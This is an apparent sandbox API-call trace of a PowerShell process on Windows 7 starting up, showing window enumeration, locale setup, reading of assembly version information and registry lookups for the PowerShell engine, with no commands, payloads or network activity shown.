	[0552.202] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4ec
	[0552.203] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x150
	[0552.203] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x720
	[0552.203] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x3c4
	[0552.203] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x7d4
	[0552.203] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x6c8
	[0552.203] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb54
	[0552.203] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb54
	[0552.203] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb5c
	[0552.203] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x838
	[0552.203] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x818
	[0552.204] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x5b8
	[0552.204] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x494
	[0552.204] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x1ec
	[0552.204] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x440
	[0552.204] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x7e8
	[0552.204] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x730
	[0552.204] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x2c8
	[0552.204] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x31c
	[0552.204] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x330
	[0552.204] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x128
	[0552.204] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x5c8
	[0552.205] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x6f8
	[0552.205] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x358
	[0552.205] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x73c
	[0552.205] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0xb0
	[0552.205] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x250
	[0552.205] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x240
	[0552.205] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x790
	[0552.205] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x61c
	[0552.205] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x568
	[0552.205] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x538
	[0552.205] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x540
	[0552.206] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x460
	[0552.206] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x79c
	[0552.206] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x4e0
	[0552.206] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x460
	[0552.206] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x26d9c0 | out: lpdwProcessId=0x26d9c0) returned 0x778
	[0552.210] WerSetFlags () returned 0x0
	[0552.218] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0552.218] CoTaskMemFree (pv=0x0) 
	[0552.219] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dd28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dd20 | out: pulNumLanguages=0x26dd28, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26dd20) returned 1
	[0552.219] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26dd28, pwszLanguagesBuffer=0x2d3dd78, pcchLanguagesBuffer=0x26dd20 | out: pulNumLanguages=0x26dd28, pwszLanguagesBuffer=0x2d3dd78, pcchLanguagesBuffer=0x26dd20) returned 1
	[0552.225] CoTaskMemAlloc (cb=0x24) returned 0x438aa0
	[0552.225] GetUserDefaultLocaleName (in: lpLocaleName=0x438aa0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0552.225] CoTaskMemFree (pv=0x438aa0) 
	[0552.250] CoTaskMemAlloc (cb=0x104) returned 0x3856d0
	[0552.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3856d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.250] CoTaskMemFree (pv=0x3856d0) 
	[0552.252] CoTaskMemAlloc (cb=0x104) returned 0x3856d0
	[0552.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3856d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.252] CoTaskMemFree (pv=0x3856d0) 
	[0552.254] CoTaskMemAlloc (cb=0x104) returned 0x3856d0
	[0552.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3856d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.254] CoTaskMemFree (pv=0x3856d0) 
	[0552.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0552.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0552.266] SetErrorMode (uMode=0x1) returned 0x1
	[0552.266] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26d9a0 | out: lpFileInformation=0x26d9a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0552.266] SetErrorMode (uMode=0x1) returned 0x1
	[0552.266] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dc10 | out: lpdwHandle=0x26dc10) returned 0x94c
	[0552.268] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d41608 | out: lpData=0x2d41608) returned 1
	[0552.269] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26db88, puLen=0x26db80 | out: lplpBuffer=0x26db88*=0x2d416a4, puLen=0x26db80) returned 1
	[0552.269] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x2d41780, puLen=0x26daf0) returned 1
	[0552.269] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0552.269] CoTaskMemAlloc (cb=0x2e) returned 0x434e30
	[0552.269] lstrcpyW (in: lpString1=0x434e30, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0552.269] CoTaskMemFree (pv=0x434e30) 
	[0552.269] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x2d417d4, puLen=0x26daf0) returned 1
	[0552.269] lstrlenW (lpString="System.Management.Automation") returned 28
	[0552.270] CoTaskMemAlloc (cb=0x3c) returned 0x43bfb0
	[0552.270] lstrcpyW (in: lpString1=0x43bfb0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0552.270] CoTaskMemFree (pv=0x43bfb0) 
	[0552.270] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x2d41830, puLen=0x26daf0) returned 1
	[0552.270] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0552.270] CoTaskMemAlloc (cb=0x20) returned 0x438b00
	[0552.270] lstrcpyW (in: lpString1=0x438b00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0552.270] CoTaskMemFree (pv=0x438b00) 
	[0552.271] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x2d41870, puLen=0x26daf0) returned 1
	[0552.271] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0552.271] CoTaskMemAlloc (cb=0x44) returned 0x43bfb0
	[0552.271] lstrcpyW (in: lpString1=0x43bfb0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0552.271] CoTaskMemFree (pv=0x43bfb0) 
	[0552.271] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x2d418d8, puLen=0x26daf0) returned 1
	[0552.271] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0552.271] CoTaskMemAlloc (cb=0x76) returned 0x3cf600
	[0552.271] lstrcpyW (in: lpString1=0x3cf600, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0552.271] CoTaskMemFree (pv=0x3cf600) 
	[0552.271] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x2d41974, puLen=0x26daf0) returned 1
	[0552.271] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0552.271] CoTaskMemAlloc (cb=0x44) returned 0x43bfb0
	[0552.271] lstrcpyW (in: lpString1=0x43bfb0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0552.271] CoTaskMemFree (pv=0x43bfb0) 
	[0552.271] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x2d419d8, puLen=0x26daf0) returned 1
	[0552.271] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0552.271] CoTaskMemAlloc (cb=0x58) returned 0x39d490
	[0552.271] lstrcpyW (in: lpString1=0x39d490, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0552.272] CoTaskMemFree (pv=0x39d490) 
	[0552.272] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x2d41a54, puLen=0x26daf0) returned 1
	[0552.272] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0552.272] CoTaskMemAlloc (cb=0x20) returned 0x438b00
	[0552.272] lstrcpyW (in: lpString1=0x438b00, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0552.272] CoTaskMemFree (pv=0x438b00) 
	[0552.272] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x2d416fc, puLen=0x26daf0) returned 1
	[0552.272] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0552.272] CoTaskMemAlloc (cb=0x66) returned 0x42d650
	[0552.272] lstrcpyW (in: lpString1=0x42d650, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0552.272] CoTaskMemFree (pv=0x42d650) 
	[0552.272] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x0, puLen=0x26daf0) returned 0
	[0552.272] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x0, puLen=0x26daf0) returned 0
	[0552.272] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26daf8, puLen=0x26daf0 | out: lplpBuffer=0x26daf8*=0x0, puLen=0x26daf0) returned 0
	[0552.272] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dac8, puLen=0x26dac0 | out: lplpBuffer=0x26dac8*=0x2d416a4, puLen=0x26dac0) returned 1
	[0552.272] CoTaskMemAlloc (cb=0x204) returned 0x3d5480
	[0552.272] VerLanguageNameW (in: wLang=0x0, szLang=0x3d5480, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0552.272] CoTaskMemFree (pv=0x3d5480) 
	[0552.273] VerQueryValueW (in: pBlock=0x2d41608, lpSubBlock="\\", lplpBuffer=0x26db18, puLen=0x26db10 | out: lplpBuffer=0x26db18*=0x2d41630, puLen=0x26db10) returned 1
	[0552.282] CoTaskMemAlloc (cb=0x104) returned 0x3856d0
	[0552.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3856d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.282] CoTaskMemFree (pv=0x3856d0) 
	[0552.287] CoTaskMemAlloc (cb=0x104) returned 0x3856d0
	[0552.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3856d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0552.287] CoTaskMemFree (pv=0x3856d0) 
	[0552.292] lstrlenW (lpString="䅁") returned 1
	[0552.303] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d9e8 | out: phkResult=0x26d9e8*=0x2fc) returned 0x0
	[0552.305] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d9d8 | out: phkResult=0x26d9d8*=0x300) returned 0x0
	[0552.305] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26da68 | out: phkResult=0x26da68*=0x304) returned 0x0
	[0554.111] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d9ac, lpData=0x0, lpcbData=0x26d9a8*=0x0 | out: lpType=0x26d9ac*=0x1, lpData=0x0, lpcbData=0x26d9a8*=0x56) returned 0x0
	[0554.112] CoTaskMemAlloc (cb=0x5a) returned 0x42d5e0
	[0554.112] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d97c, lpData=0x42d5e0, lpcbData=0x26d978*=0x56 | out: lpType=0x26d97c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d978*=0x56) returned 0x0
	[0554.112] CoTaskMemFree (pv=0x42d5e0) 
	[0554.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0554.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0554.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0554.144] CoTaskMemAlloc (cb=0x104) returned 0x3856d0
	[0554.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3856d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0554.145] CoTaskMemFree (pv=0x3856d0) 
	[0563.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0563.510] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0567.472] CoTaskMemAlloc (cb=0x104) returned 0x445b80
	[0567.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x445b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.472] CoTaskMemFree (pv=0x445b80) 
	[0567.473] CoTaskMemAlloc (cb=0x104) returned 0x445b80
	[0567.473] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x445b80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.473] CoTaskMemFree (pv=0x445b80) 
	[0567.507] CoTaskMemAlloc (cb=0x104) returned 0x446cb0
	[0567.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x446cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.507] CoTaskMemFree (pv=0x446cb0) 
	[0567.509] CoTaskMemAlloc (cb=0x104) returned 0x446cb0
	[0567.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x446cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.509] CoTaskMemFree (pv=0x446cb0) 
	[0567.509] CoTaskMemAlloc (cb=0x104) returned 0x446cb0
	[0567.509] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x446cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.509] CoTaskMemFree (pv=0x446cb0) 
	[0572.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0572.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0573.764] CoTaskMemAlloc (cb=0x104) returned 0x44b580
	[0573.764] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44b580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0573.764] CoTaskMemFree (pv=0x44b580) 
	[0573.768] CoTaskMemAlloc (cb=0x104) returned 0x44b580
	[0573.768] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x44b580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0573.768] CoTaskMemFree (pv=0x44b580) 
	[0575.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0575.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0588.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0588.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0590.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0590.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0594.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0594.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
